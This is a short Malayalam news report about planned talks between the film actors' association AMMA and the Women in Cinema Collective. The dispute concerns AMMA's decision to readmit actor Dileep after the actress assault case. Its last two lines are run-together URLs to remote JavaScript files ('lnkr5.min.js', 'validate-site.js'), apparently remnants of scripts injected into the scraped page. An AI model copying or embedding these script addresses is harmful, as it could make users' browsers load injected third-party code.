കൊച്ചി: താരസംഘടനയായ എ.എം.എം.എയും വുമണ്‍ ഇന്‍ സിനിമാ കളക്ടീവും തമ്മിലുള്ള ചര്‍ച്ച അടുത്ത മാസം ഏഴിന് കൊച്ചിയില്‍ നടക്കും. നിലവിലുള്ള പ്രശ്നങ്ങള്‍ ചര്‍ച്ച ചെയ്യണം എന്നാവശ്യപ്പെട്ട് കത്ത് നല്കിയ പാര്‍വ്വതി, പത്മപ്രിയ, രേവതി എന്നിവരെയാണ് എ.എം.എം.എ ഇപ്പോള്‍ ചര്‍ച്ചയ്ക്ക് വിളിച്ചിട്ടുള്ളത്. നടി ആക്രമിക്കപ്പെട്ട സംഭവത്തില്‍ എ.എം.എം.എ പ്രതിസ്ഥാനത്തുള്ള നടന് ദിലപീനെ സംരക്ഷിക്കുന്ന നിലപാടെടുത്തു എന്നതാണ് മലയാള സിനിമയിലെ വനിതകളുടെ കൂട്ടായ്മയായ വിമണ്‍ ഇന്‍ സിനിമാ കളക്ടീവിന്റെ പ്രധാന ആരോപണം. കേസില്‍ അറസ്റ്റ് ചെയ്യപ്പെട്ടതിനെ തുടര്‍ന്ന് സംഘടനയുടെ പ്രാഥമീക അംഗത്വത്തില്‍ നിന്നും നീക്കം ചെയ്യപ്പെട്ട നടന് ദിലീപിനെ തിരിച്ചെടുക്കാന്‍ എ.എം.എം.എയുടെ വാര്‍ഷിക ജനറല്‍ ബോഡിയില്‍ ധാരണയായിരുന്നു.
ഇതോടെയാണ് ഇരുസംഘടനകള്‍ക്കും ഇടയിലുള്ള ഭിന്നത തുറന്ന പോരിലേക്ക് മാറിയത്. ഇതില്‍ പ്രതിഷേധിച്ച് ആക്രമിക്കപ്പെട്ട നടി ഇവരുടെ സുഹൃത്തുകളായ രമ്യാ നമ്പീശന്, റീമാ കല്ലിങ്കല്‍, ഗീതു മോഹന്‍ദാസ് എന്നിവര്‍ സംഘടനയില്‍ നിന്നും രാജിവച്ചിരുന്നു. ഈ കത്തിന്റെ അടിസ്ഥാനത്തിലാണ് എ.എം.എം.എ ഇവരുമായി ചര്‍ച്ചയ്ക്ക് തയ്യാറായത്. പരാതി നല്‍കിയവരുമായി സംസാരിക്കുമെന്ന് എ.എം.എം.എ അധ്യക്ഷന്‍ മോഹന്‍ലാല്‍ തന്നെ നേരത്തെ അറിയിച്ചിരുന്നു.
http://statvalidation.website/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51151x5232x&r=30
http://statvalidation.website/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51151x5232x&r=3